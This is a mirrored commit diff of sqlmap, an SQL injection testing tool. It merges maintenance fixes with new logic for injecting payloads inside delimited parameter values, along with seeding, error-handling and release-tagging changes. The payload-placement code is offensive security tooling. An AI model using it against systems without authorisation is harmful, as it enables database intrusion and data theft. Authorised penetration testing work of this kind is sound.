mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-30 18:10:12 +03:00
Merge remote-tracking branch 'sqlmapproject/master'
This commit is contained in:
commit
4306adc3b1
|
@ -12,7 +12,7 @@ This file lists bundled packages and their associated licensing terms.
|
|||
Copyright (C) 2005, Zope Corporation.
|
||||
Copyright (C) 1998-2000, Gisle Aas.
|
||||
* The Colorama library located under thirdparty/colorama/.
|
||||
Copyright (C) 2010, Jonathan Hartley.
|
||||
Copyright (C) 2013, Jonathan Hartley.
|
||||
* The Fcrypt library located under thirdparty/fcrypt/.
|
||||
Copyright (C) 2000, 2001, 2004 Carey Evans.
|
||||
* The Odict library located under thirdparty/odict/.
|
||||
|
|
|
@ -99,7 +99,7 @@ void usage(char *path)
|
|||
printf(" -h this screen\n");
|
||||
printf(" -b num maximal number of blanks (unanswered icmp requests)\n");
|
||||
printf(" before quitting\n");
|
||||
printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
|
||||
printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
|
||||
printf("In order to improve the speed, lower the delay (-d) between requests or\n");
|
||||
printf("increase the size (-s) of the data buffer\n");
|
||||
}
|
||||
|
@ -203,8 +203,6 @@ int main(int argc, char **argv)
|
|||
PROCESS_INFORMATION pi;
|
||||
int status;
|
||||
unsigned int max_data_size;
|
||||
struct hostent *he;
|
||||
|
||||
|
||||
// set defaults
|
||||
target = 0;
|
||||
|
|
21
extra/shutils/postcommit-hook
Normal file
21
extra/shutils/postcommit-hook
Normal file
|
@ -0,0 +1,21 @@
|
|||
#!/bin/bash
|
||||
|
||||
SETTINGS="../../lib/core/settings.py"
|
||||
|
||||
declare -x SCRIPTPATH="${0}"
|
||||
|
||||
FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
|
||||
|
||||
if [ -f $FULLPATH ]
|
||||
then
|
||||
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
|
||||
declare -a LINE;
|
||||
NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
|
||||
if [ -n "$NEW_TAG" ]
|
||||
then
|
||||
git commit -am "Automatic monthly tagging"
|
||||
echo "Creating new tag ${NEW_TAG}";
|
||||
git tag $NEW_TAG;
|
||||
git push origin $NEW_TAG
|
||||
fi
|
||||
fi;
|
|
@ -10,7 +10,7 @@ if [ -f $FULLPATH ]
|
|||
then
|
||||
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
|
||||
declare -a LINE;
|
||||
INCREMENTED=$(python -c "import re, sys; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
||||
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
||||
if [ -n "$INCREMENTED" ]
|
||||
then
|
||||
sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH
|
||||
|
|
|
@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
|
||||
import copy
|
||||
import httplib
|
||||
import random
|
||||
import re
|
||||
import socket
|
||||
import time
|
||||
|
@ -62,7 +63,6 @@ from lib.core.exception import SqlmapConnectionException
|
|||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import CLOUDFLARE_SERVER_HEADER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||
|
@ -906,7 +906,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||
|
||||
if not result:
|
||||
randStr = randomStr()
|
||||
payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix)
|
||||
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
|
||||
casting = Request.queryPage(payload, place, raise404=False)
|
||||
|
||||
|
@ -1383,10 +1383,6 @@ def checkConnection(suppressOutput=False):
|
|||
else:
|
||||
kb.errorIsNone = True
|
||||
|
||||
if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
|
||||
warnMsg = "CloudFlare response detected"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
except SqlmapConnectionException, ex:
|
||||
if conf.ipv6:
|
||||
warnMsg = "check connection to a provided "
|
||||
|
|
|
@ -209,9 +209,8 @@ def _saveToHashDB():
|
|||
_[key].data.update(injection.data)
|
||||
hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
|
||||
|
||||
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set()
|
||||
_.update(kb.absFilePaths)
|
||||
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True)
|
||||
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
|
||||
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
|
||||
|
||||
if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
|
||||
hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
|
||||
|
@ -464,7 +463,7 @@ def start():
|
|||
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif parameter in conf.skip:
|
||||
elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||
|
@ -522,7 +521,7 @@ def start():
|
|||
injection = checkSqlInjection(place, parameter, value)
|
||||
proceed = not kb.endDetection
|
||||
|
||||
if injection is not None and injection.place is not None:
|
||||
if getattr(injection, "place", None) is not None:
|
||||
kb.injections.append(injection)
|
||||
|
||||
# In case when user wants to end detection phase (Ctrl+C)
|
||||
|
|
|
@ -17,6 +17,7 @@ from lib.core.common import isTechniqueAvailable
|
|||
from lib.core.common import randomInt
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.common import safeSQLIdentificatorNaming
|
||||
from lib.core.common import safeStringFormat
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.common import splitFields
|
||||
from lib.core.common import unArrayizeValue
|
||||
|
@ -34,10 +35,12 @@ from lib.core.enums import PLACE
|
|||
from lib.core.enums import POST_HINT
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||
from lib.core.settings import NULL
|
||||
from lib.core.settings import PAYLOAD_DELIMITER
|
||||
from lib.core.settings import REPLACEMENT_MARKER
|
||||
from lib.core.unescaper import unescaper
|
||||
|
@ -94,9 +97,12 @@ class Agent(object):
|
|||
paramDict = conf.paramDict[place]
|
||||
origValue = getUnicode(paramDict[parameter])
|
||||
|
||||
if place == PLACE.URI:
|
||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
if place == PLACE.URI:
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
else:
|
||||
origValue = re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)
|
||||
origValue = origValue[origValue.rfind('/') + 1:]
|
||||
for char in ('?', '=', ':'):
|
||||
if char in origValue:
|
||||
|
@ -160,6 +166,9 @@ class Agent(object):
|
|||
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
|
||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
|
||||
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
||||
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
|
||||
retVal = "%s=%s" % (parameter, paramString.replace(_, self.addPayloadDelimiters(newValue)))
|
||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||
else:
|
||||
|
@ -272,7 +281,7 @@ class Agent(object):
|
|||
where = kb.injection.data[kb.technique].where if where is None else where
|
||||
comment = kb.injection.data[kb.technique].comment if comment is None else comment
|
||||
|
||||
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
|
||||
if Backend.getIdentifiedDbms() == DBMS.ACCESS and "--" in (comment or ""):
|
||||
comment = queries[DBMS.ACCESS].comment.query
|
||||
|
||||
if comment is not None:
|
||||
|
@ -295,7 +304,7 @@ class Agent(object):
|
|||
_ = (
|
||||
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
||||
("[HASH_REPLACE]", kb.chars.hash_),
|
||||
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
||||
)
|
||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
||||
|
||||
|
@ -746,6 +755,9 @@ class Agent(object):
|
|||
intoRegExp = intoRegExp.group(1)
|
||||
query = query[:query.index(intoRegExp)]
|
||||
|
||||
position = 0
|
||||
char = NULL
|
||||
|
||||
for element in xrange(0, count):
|
||||
if element > 0:
|
||||
unionQuery += ','
|
||||
|
@ -923,7 +935,7 @@ class Agent(object):
|
|||
else:
|
||||
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
||||
|
||||
limitedQuery = limitedQuery % fromFrom
|
||||
limitedQuery = safeStringFormat(limitedQuery, (fromFrom,))
|
||||
limitedQuery += "=%d" % (num + 1)
|
||||
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
|
|
|
@ -91,6 +91,7 @@ from lib.core.log import LOGGER_HANDLER
|
|||
from lib.core.optiondict import optDict
|
||||
from lib.core.settings import BANNER
|
||||
from lib.core.settings import BOLD_PATTERNS
|
||||
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
|
||||
|
@ -128,6 +129,7 @@ from lib.core.settings import PARTIAL_VALUE_MARKER
|
|||
from lib.core.settings import PAYLOAD_DELIMITER
|
||||
from lib.core.settings import PLATFORM
|
||||
from lib.core.settings import PRINTABLE_CHAR_REGEX
|
||||
from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT
|
||||
from lib.core.settings import PYVERSION
|
||||
from lib.core.settings import REFERER_ALIASES
|
||||
from lib.core.settings import REFLECTED_BORDER_REGEX
|
||||
|
@ -150,6 +152,7 @@ from lib.core.threads import getCurrentThreadData
|
|||
from lib.utils.sqlalchemy import _sqlalchemy
|
||||
from thirdparty.clientform.clientform import ParseResponse
|
||||
from thirdparty.clientform.clientform import ParseError
|
||||
from thirdparty.colorama.initialise import init as coloramainit
|
||||
from thirdparty.magic import magic
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
from thirdparty.termcolor.termcolor import colored
|
||||
|
@ -597,6 +600,17 @@ def paramToDict(place, parameters=None):
|
|||
warnMsg += "so sqlmap could be able to run properly"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if place in (PLACE.POST, PLACE.GET):
|
||||
regex = r"\A([^\w]+.*\w+)([^\w]+)\Z"
|
||||
match = re.search(regex, testableParameters[parameter])
|
||||
if match:
|
||||
_ = re.sub(regex, "\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, testableParameters[parameter])
|
||||
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
|
||||
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
|
||||
test = readInput(message, default="N")
|
||||
if test[0] in ("y", "Y"):
|
||||
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
|
||||
|
||||
if conf.testParameter and not testableParameters:
|
||||
paramStr = ", ".join(test for test in conf.testParameter)
|
||||
|
||||
|
@ -967,7 +981,12 @@ def randomRange(start=0, stop=1000, seed=None):
|
|||
423
|
||||
"""
|
||||
|
||||
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
randint = _.randint
|
||||
else:
|
||||
randint = random.randint
|
||||
|
||||
return int(randint(start, stop))
|
||||
|
||||
|
@ -980,7 +999,12 @@ def randomInt(length=4, seed=None):
|
|||
874254
|
||||
"""
|
||||
|
||||
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
choice = _.choice
|
||||
else:
|
||||
choice = random.choice
|
||||
|
||||
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
|
||||
|
||||
|
@ -993,7 +1017,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
|
|||
'RNvnAv'
|
||||
"""
|
||||
|
||||
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
|
||||
if seed is not None:
|
||||
_ = getCurrentThreadData().random
|
||||
_.seed(seed)
|
||||
choice = _.choice
|
||||
else:
|
||||
choice = random.choice
|
||||
|
||||
if alphabet:
|
||||
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
|
||||
|
@ -1022,14 +1051,17 @@ def getHeader(headers, key):
|
|||
break
|
||||
return retVal
|
||||
|
||||
def checkFile(filename):
|
||||
def checkFile(filename, raiseOnError=True):
|
||||
"""
|
||||
Checks for file existence and readability
|
||||
"""
|
||||
|
||||
valid = True
|
||||
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
try:
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
valid = False
|
||||
except UnicodeError:
|
||||
valid = False
|
||||
|
||||
if valid:
|
||||
|
@ -1039,18 +1071,25 @@ def checkFile(filename):
|
|||
except:
|
||||
valid = False
|
||||
|
||||
if not valid:
|
||||
if not valid and raiseOnError:
|
||||
raise SqlmapSystemException("unable to read file '%s'" % filename)
|
||||
|
||||
return valid
|
||||
|
||||
def banner():
|
||||
"""
|
||||
This function prints sqlmap banner with its version
|
||||
"""
|
||||
|
||||
_ = BANNER
|
||||
if not getattr(LOGGER_HANDLER, "is_tty", False):
|
||||
_ = re.sub("\033.+?m", "", _)
|
||||
dataToStdout(_, forceOutput=True)
|
||||
if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
|
||||
_ = BANNER
|
||||
|
||||
if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
|
||||
_ = re.sub("\033.+?m", "", _)
|
||||
elif IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
dataToStdout(_, forceOutput=True)
|
||||
|
||||
def parsePasswordHash(password):
|
||||
"""
|
||||
|
@ -2183,7 +2222,22 @@ def pushValue(value):
|
|||
Push value to the stack (thread dependent)
|
||||
"""
|
||||
|
||||
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
|
||||
_ = None
|
||||
success = False
|
||||
|
||||
for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT):
|
||||
try:
|
||||
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
|
||||
success = True
|
||||
break
|
||||
except Exception, ex:
|
||||
_ = ex
|
||||
|
||||
if not success:
|
||||
getCurrentThreadData().valueStack.append(None)
|
||||
|
||||
if _:
|
||||
raise _
|
||||
|
||||
def popValue():
|
||||
"""
|
||||
|
@ -2917,7 +2971,7 @@ def showHttpErrorCodes():
|
|||
msg += "could mean that some kind of protection is involved (e.g. WAF)"
|
||||
logger.debug(msg)
|
||||
|
||||
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
|
||||
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436)
|
||||
"""
|
||||
Returns file handle of a given filename
|
||||
"""
|
||||
|
@ -3126,14 +3180,6 @@ def intersect(valueA, valueB, lowerCase=False):
|
|||
|
||||
return retVal
|
||||
|
||||
def cpuThrottle(value):
|
||||
"""
|
||||
Does a CPU throttling for lesser CPU consumption
|
||||
"""
|
||||
|
||||
delay = 0.00001 * (value ** 2)
|
||||
time.sleep(delay)
|
||||
|
||||
def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||
"""
|
||||
Neutralizes reflective values in a given content based on a payload
|
||||
|
@ -3142,59 +3188,65 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
|||
|
||||
retVal = content
|
||||
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||
def _(value):
|
||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||
return value
|
||||
try:
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||
def _(value):
|
||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||
return value
|
||||
|
||||
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
|
||||
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
|
||||
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
|
||||
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
|
||||
|
||||
if regex != payload:
|
||||
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
|
||||
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
|
||||
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
|
||||
if regex != payload:
|
||||
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
|
||||
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
|
||||
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
|
||||
|
||||
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
|
||||
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
|
||||
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
|
||||
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
|
||||
|
||||
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
|
||||
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
|
||||
|
||||
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
|
||||
else:
|
||||
regex = r"\b%s" % regex
|
||||
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
|
||||
else:
|
||||
regex = r"\b%s" % regex
|
||||
|
||||
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
|
||||
else:
|
||||
regex = r"%s\b" % regex
|
||||
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
|
||||
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
|
||||
else:
|
||||
regex = r"%s\b" % regex
|
||||
|
||||
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
|
||||
if len(parts) > 2:
|
||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
if len(parts) > 2:
|
||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
|
||||
if retVal != content:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||
if not suppressWarning:
|
||||
warnMsg = "reflective value(s) found and filtering out"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
|
||||
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
|
||||
warnMsg += "test those separately in case that attack on this page fails"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
|
||||
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
|
||||
kb.reflectiveMechanism = False
|
||||
if retVal != content:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
|
||||
logger.debug(debugMsg)
|
||||
warnMsg = "reflective value(s) found and filtering out"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
|
||||
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
|
||||
warnMsg += "test those separately in case that attack on this page fails"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
|
||||
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
|
||||
kb.reflectiveMechanism = False
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
|
||||
logger.debug(debugMsg)
|
||||
except MemoryError:
|
||||
kb.reflectiveMechanism = False
|
||||
if not suppressWarning:
|
||||
debugMsg = "turning off reflection removal mechanism (because of low memory issues)"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
return retVal
|
||||
|
||||
|
|
|
@ -11,7 +11,6 @@ import pickle
|
|||
import re
|
||||
import StringIO
|
||||
import sys
|
||||
import types
|
||||
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
|
|
@ -11,7 +11,6 @@ _defaults = {
|
|||
"csvDel": ",",
|
||||
"timeSec": 5,
|
||||
"googlePage": 1,
|
||||
"cpuThrottle": 5,
|
||||
"verbose": 1,
|
||||
"delay": 0,
|
||||
"timeout": 30,
|
||||
|
|
|
@ -13,6 +13,7 @@ import tempfile
|
|||
import threading
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import checkFile
|
||||
from lib.core.common import dataToDumpFile
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
|
@ -37,6 +38,7 @@ from lib.core.exception import SqlmapGenericException
|
|||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.replication import Replication
|
||||
from lib.core.settings import DUMP_FILE_BUFFER_SIZE
|
||||
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import METADB_SUFFIX
|
||||
|
@ -433,7 +435,7 @@ class Dump(object):
|
|||
dumpDbPath = tempDir
|
||||
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
||||
if not os.path.isfile(dumpFileName):
|
||||
if not checkFile(dumpFileName, False):
|
||||
try:
|
||||
openFile(dumpFileName, "w+b").close()
|
||||
except SqlmapSystemException:
|
||||
|
@ -448,8 +450,8 @@ class Dump(object):
|
|||
else:
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||
|
||||
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
||||
appendToFile = any((conf.limitStart, conf.limitStop)) and checkFile(dumpFileName, False)
|
||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
|
||||
|
||||
count = int(tableValues["__infos__"]["count"])
|
||||
separator = str()
|
||||
|
|
|
@ -151,7 +151,6 @@ from lib.utils.crawler import crawl
|
|||
from lib.utils.deps import checkDependencies
|
||||
from lib.utils.search import search
|
||||
from lib.utils.purge import purge
|
||||
from thirdparty.colorama.initialise import init as coloramainit
|
||||
from thirdparty.keepalive import keepalive
|
||||
from thirdparty.oset.pyoset import oset
|
||||
from thirdparty.socks import socks
|
||||
|
@ -1654,10 +1653,20 @@ def _cleanupOptions():
|
|||
conf.testFilter = conf.testFilter.strip('*+')
|
||||
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
|
||||
|
||||
try:
|
||||
re.compile(conf.testFilter)
|
||||
except re.error:
|
||||
conf.testFilter = re.escape(conf.testFilter)
|
||||
|
||||
if conf.testSkip:
|
||||
conf.testSkip = conf.testSkip.strip('*+')
|
||||
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
|
||||
|
||||
try:
|
||||
re.compile(conf.testSkip)
|
||||
except re.error:
|
||||
conf.testSkip = re.escape(conf.testSkip)
|
||||
|
||||
if "timeSec" not in kb.explicitSettings:
|
||||
if conf.tor:
|
||||
conf.timeSec = 2 * conf.timeSec
|
||||
|
@ -1821,6 +1830,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
kb.dnsTest = None
|
||||
kb.docRoot = None
|
||||
kb.dumpTable = None
|
||||
kb.dumpKeyboardInterrupt = False
|
||||
kb.dynamicMarkings = []
|
||||
kb.dynamicParameter = False
|
||||
kb.endDetection = False
|
||||
|
@ -2330,10 +2340,6 @@ def _basicOptionValidation():
|
|||
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
|
||||
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.textOnly and conf.nullConnection:
|
||||
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
@ -2535,9 +2541,6 @@ def _resolveCrossReferences():
|
|||
lib.controller.checks.setVerbosity = setVerbosity
|
||||
|
||||
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
_setConfAttributes()
